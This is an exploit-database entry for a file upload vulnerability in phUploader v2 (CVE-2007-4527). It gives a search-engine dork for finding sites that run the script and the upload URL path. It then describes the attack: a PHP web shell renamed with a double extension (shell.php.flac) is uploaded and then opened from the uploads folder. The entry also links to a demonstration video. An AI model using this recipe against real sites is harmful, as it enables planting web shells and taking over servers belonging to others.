phUploader 2 - Arbitrary File Upload

Author: wlhaan-hacker
type: webapps
platform: php
port: 
date_added: 2009-12-19 
date_updated:  
verified: 1 
codes: CVE-2007-4527;OSVDB-45829 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphUploader.zip

# Exploit Title: phUploader Remote File Upload Vulnerability
# Date: 20-12-2009
# Author: wlhaan-hacker
#
# Version: v2
# CVE : [N/A]

==========================================================================

~ Script Name : phUploader)
~ Language : php
~
~ email: iit@hotmail.com
~
============================================================

Dork : Powered By phUploader



============================================================
Exploit :



http://{target}/script path/upload.php

chang shell

shell.php.flac

go to shell

http://{target}/script path/uploads/shell.php.flac

Exploit viduo
Download:
http://filaty.com/f/912/99431/up5.rar.html
============================================================

thank you for

shooq hacker
============================================================

www.sa-hacker.com/vb
============================================================